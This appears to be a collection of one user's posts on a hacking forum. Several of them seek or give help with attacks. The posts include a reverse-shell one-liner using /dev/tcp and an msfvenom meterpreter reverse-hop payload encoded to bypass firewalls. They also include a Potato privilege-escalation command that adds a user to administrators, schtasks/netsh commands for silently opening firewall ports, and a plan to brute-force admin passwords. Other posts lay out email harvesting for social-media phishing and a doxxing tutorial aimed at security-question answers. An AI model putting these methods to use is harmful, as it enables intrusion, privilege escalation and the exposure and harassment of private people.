vailixi

I thought this might be a good topic for discussion. I had wondered how hard it would be add a bunch of people I didn't know to facebook or LinkedIn. I had noticed when I signed up for some social media sites that there is an option to import contacts from your email contact list. While it's illegal to send spam emails I don't think it's illegal to use the email addresses to add friends on facebook. So basically if you wanted to find a bunch of people from a company or a school on LinkedIn or facebook you could pretty much use a method like this in social engineering or phishing on social media. Once again I'm not totally sure on the legality of doing this but I figure it is worth a discussion. Steps: Get the email list I figured a guy could pretty much hit up pastebin and create an email list for any organization he wanted to target. Grep out the email address and sort them for uniqueness. Also sort out domain names or domain extenssions you don't want like .gov or .mil addresses. You probably wouldn't want to accidentally spam or phish them. Split the lists into sections smaller than the maximum allowed limit. I think gmail it's 3000 or 5000. Forgot it. split them into 2500 line text files. Then convert the text file into CSV with a program kinda like this. I wrote this pretty hastily. Just opens up a file and writes a csv header with the correct fomat for gmail. Make sure to get the number of commas right. You can do this with Yahoo! and other free email services. There are some security measures against it. Then import the email list into your contacts as a CSV. Then add friends on social media sites from your contact list. That simple. Here's a link to the blog post I wrote about it. http://codeexamplescplusplus.blogspot.com/2016/10/csv-maker-c.html Here's some hasty C++ for the CSV maker. My code is shit just to let you know in advance. //application to sort email addresses and put them into a CSV for use with gmail. #include <string> #include <sstream> #include <iostream> #include <cctype> #include <fstream> #include <iomanip> using namespace std; int main (int argc, char* argv[]) { //build command line statement from string variables {ofstream myfile; myfile.open ("/root/Desktop/emails.csv"); { string line; ifstream infile ("/root/file.txt"); //input the layout information for CSV file myfile << "Name,Given Name,Additional Name,Family Name,Yomi Name,Given Name Yomi,Additional Name Yomi,Family Name Yomi,Name Prefix,Name Suffix,Initials,Nickname,Short Name,Maiden Name,Birthday,Gender,Location,Billing Information,Directory Server,Mileage,Occupation,Hobby,Sensitivity,Priority,Subject,Notes,Group Membership,E-mail 1 - Type,E-mail 1 - Value,E-mail 2 - Type,E-mail 2 - Value" << endl; if (infile.is_open()) { while ( getline (infile,line) ) //output conacts to contact list. Comas delimit contact information fields. myfile << ",,,,,,,,,,,,,,,,,,,,,,,,,,,* ," << line << ",," << endl; infile.close(); myfile.close(); } else cout << "Unable to open file" << endl; } } return 0; }

Not totally sure what I'm doing. I started a reverse shell on my ubuntu machine. 0<&96-;exec 96<>/dev/tcp/192.168.1.4/2222;sh <&96 >&96 2>&96 I get a file descriptor error when I run the command but it opens a shell and I can interact with the target system (Ubuntu 16.04 Desktop). When I use cron_persistence from armitage it seems to work fine. When I reboot the target it just black screens and never runs desktop. It's funny. I had been hacked running Ubuntu about a week ago but I figured that the attacker had intentionally PDOSed my system. It was probably accidental. Anybody have any idea what's going on here? What am I doing wrong with the shell and what do I do to fix the issue on the target machine?

Before I get into this to much I'm going to say a few words on ethics. Bullying sometimes serves as a catalyst for positive social change. From an anthropological prospective bullying is a way more primitive people assert their place in the dominance hierarchy. Yes in this day and age it would be nice if people were beyond the need for this but really we aren't. People I think are a little to thin skinned and will report people for just about any arbitrary reason. Not cool if you have a business that depends partially on social media as a marketing platform. That all being said I learned d0xxing when I was an activist. I later applied that to skiptracing gigs and other legitimate investigations. Open Notepad. Copy and paste everything from their social media profile. Start looking up usernames on sites like Pipl If you get hits on the usernames look through those profiles and check the personal information to check for matches. For example if the person's age is about 30, profiles will pop up with age of 60 and those aren't good results. Make a logic chart and start narrowing down the results until you have a few suspects. You'll be amazed how many people use the same username or display name for multiple accounts. Sometimes they will have a twitter that will have the same username as the account in question and the twitter account will have their real name. You can look them up on sites like LinkedIn and pretty much know everything about them. You can get grids on their work place. If you get an email address that is a work email you do a whois search on the domain name. If it comes up with domain privacy don't just stop looking. Try to whois the nameservers sometimes people will pretty stealth with their domain privacy but then the hosting company is one of their buddies and you can just look them up. Sometimes the person will be friends with the webmaster on sites like facebook and you can learn more about them. So if you've gone the d0xxing route you have some person information on the person. A lot of times you can find information like hometown, mother's maiden name, etc. Sometimes those are used as security questions for password resets and things like that. Keep in mind that illegal hacking could land you in prison. Also if you want to present evidence to an employer or authorities it should be evidence that you came upon legally. Also bare in mind the impact releasing the person's information may have on them professionally or personally and way out whether or not it is a proportional response to what they were doing. In other words don't make your personal mission to wreck someone's because you are butthurt about something somebody said on tinychat, way out the impact. Also on the record I adore internet sh*@lords. They make me laugh. I don't take kindly when someone PDOSes my machine because I said something that doesn't go along with whatever narrative they are pushing.

I installed Kali on my new laptop. There's an issue when it boots. Everything works fine except when it boots Kali doesn't find a display to use. I think it's an issue where by default the system uses both displays (The regular laptop screen and the HDMI output). In some cases you can fix issues like this in the BIOS by setting the default display device. My BIOS doesn't have that option. So what I think is going on is that since there isn't a display set Kali doesn't know which of the two to use and it just black screens. I think that's the issue. Not totally sure though. It sounds legit though. KEK. If I boot into recover mode I get a shell. Can I fix the issue from here? Is there a boot parameter I can feed it for the display? Is there a config I can edit. Can I edit the config file then live build the thing so it works without hassle? What's the best way to fix something like this?

I was going to install Kali Linux on a laptop that I picked up. It's UEFI secure boot. I found some forum posts about this from 2013 but it is a post with an unclear tutorial and then all of the responses are people saying it didn't work and asking questions. Have any of you guys done this lately? Is there a script for this or a well worded tutorial? This sounds stupid but EFI isn't really something I've had to deal with. My old Dell didn't have it. Then I got a Toshiba. I doesn't have it either. There's just a secure boot thing option you turn off in the bios and then you can install whatever you want on it. Then I picked up another Dell because it was on sale. I'm not sure the whole process and I don't really have time to trial and error until I get it right. Does anyone have a script. I know how to copy the ISO to the flash drive and make a regular installer. As far as I know it's just adding a few files and directories. Not sure else to put on the flash drive or where it goes. Anybody?

The shame of it.

I was messing around with splitting down a wordlist and I must have cut it just right to where my computer reads it as a music file instead of text. I don't know much about how computers handle music files and my only thoughts are that some of the text is being read by the file system and tells Linux that the file is a music file. Nautilus shows the rythimbox icon instead of the text icon. If I change the file from xaaaaabcc to xaaaaabcc.txt it will show up as a text file. It is actually a text file. https://drive.google.com/open?id=0B8Mz8bu8fJ4kclk1M0ZYQnRDcHM Anyone want to look at this file and tell me what I did?

I'm trying to load some data into a database. But I really don't use MySQL so much. It's been been long enough that I pretty much forgot what to do. What I want to do is load an at text or XML document into a database. But when I load the document into the database. I get a bunch of null entries which really doesn't do me any good. What I really need is a cheat sheet. Any good MySQL short documentation on this?

Makes sense. I just want to sell some ad space to help pay for hosting.

Short answer: You can pipe crunch into aircrack-ng but crunch is a little faster than aircrack and it will create a temp file where the words go before being fed into aircrack and eventually it will eat up all of your RAM and swap. You can also pipe JTR into aircrack. Something with FPGA support is what you want if you are bruting 12 characters. Otherwise you will never have the keys per second to make it worth while. If you want to spend ton of money on specialized hardware Pico Computing has something for you. If you look up password cracking or hash cracking sites you will see that people make wordlists. Sometimes they are shorter lists with large rule sets and some are just really big lists. They might be common dictionary words, phone numbers, hashes, account numbers, or any other combination of characters. A dictionary attack would be better than brute force. But brute forcing the password should be your last resort after attempting a WPS PIN search or if you're lucky Pixie dust attack. Possibly use social engineering to get the password or exploit a machine that connects to it regularly. Possible something you can gain physical access to with ease like a laptop left unattended in the cafeteria while the user is in the rest room.

I mostly see hak5 items for sale. Is it ok offer non-Hak5 items for sale in this section?

What are you reading right now? What's on your reading list? Hacking and security related or not, doesn't matter.

I was a little curious about the PrependMigrate option for meterpreter. I was trying to migrate to iexplore.exe or MicrosoftEdge.exe. But I'm not sure how to set the PrependMigrateProc option when generating my payload. I'm mostly confused on the path for the program I want to migrate to. If I use the program name it just doesn't work. When I use the full path it throws a different error like my syntax is wrong. Any ideas? msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 PrependMigrate true PrependMigrateProc "C:\Program Files\Internet Explorer\iexplore.exe" --platform win HOPURL=http://192.168.1.10/hop.php EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/radpayload.raw

Sorry pretty much trying to find new ways to actually get my payload to bypass firewall and make reverse connection reliably. I was using a reserve hop http meterpreter and seemed work for a while.

Incidentally I found this wpad spoofing attack that seems to work rather well. Potato attack Potato source code on Github Syntax was something like this: Potato.exe -ip 192.168.1.9 -disable_exhaust true cmd "C:\\windows\\system32\\cmd.exe /k net localgroup administrator me add" This actually worked for adding my user to the administrators group. That's cool and all. I still don't have the password for netsh and open a port on the firewall though. Is there a way to just kill the firewall?

Build waterproof enclosures for your computers if it is cost effective. Pelican makes some really nice waterproof cases. Then You'll also probably have to have some kind of cooling system other than air. But I can see most of the system being completely waterproofed. Maybe the not the power supply. You'll want to be able to shut everything down. You can probably do this with some kind of switch like fish tanks have. It's basically two electrical leads that are close enough together that when the water level is up enough or down far enough in some cases the liquid will close the circuit in some cases break the circuit depending on how you are doing things. Like a water level alarm. Maybe make something like that to shut things off. But really if you can afford a bunch of this stuff. Get a room on the top floor instead.

I have read some on encryption. Lattice based encryption is something you may be interested in reading about. SSL and VPNs are secure against less sophisticated attackers who have limited resources but state sponsored actors can probably crack them with ease at this point.

OK, ok that makes sense. LOL. I tried this: schtasks /Create /S %computername% /RU desktop/8alleale\me /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30 Now I'm at least getting access denied instead of syntax error. I tried this as well: schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30 Same this way access denied. Is there something wrong with the way I'm getting the system and username?

I don't get that. Am I piping the password into dir somehow?

I bought one of those. I got so frustrated with the thing I took it out and shot it. True story.

Or maybe something like this: Keep getting syntax errors. I think I need escape characters but not really sure how to write out this command. schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN portopen /TR "netsh advfirewall firewall add rule name=Open Port 9999 dir=in action=allow protocol=TCP localport=9999 /ST 18:44"

Is the port 4444 open on target system's firewall?

Digininja, any chance you can help me with syntax on this? I think I'm going to just go ahead and brute scheduled task that will open a port on the firewall. I'm not sure on syntax for schtasks and netsh advfirewall. Here's what I was trying for but my syntax is horribly wrong. Not really sure on the options. schtasks /Create /S %computername% /U %username% /P password /TN portopen /SC %time% /tr netsh advfirewall firewall add rule name="Open Port 9999" dir=in action=allow protocol=TCP localport=9999

So I wanted to make payload which can be run without admin privileges brute force the admin password by call a program some program with system() that would require a password until the password is found. My question is what is the fastest command you can run from Windows command line that will actually require administrator a password? Also how do I get an error message back for conditional logic that will tell me if I got the right password? Any Ideas?

What you are saying is valid. Doing away with the machines altogether would be great.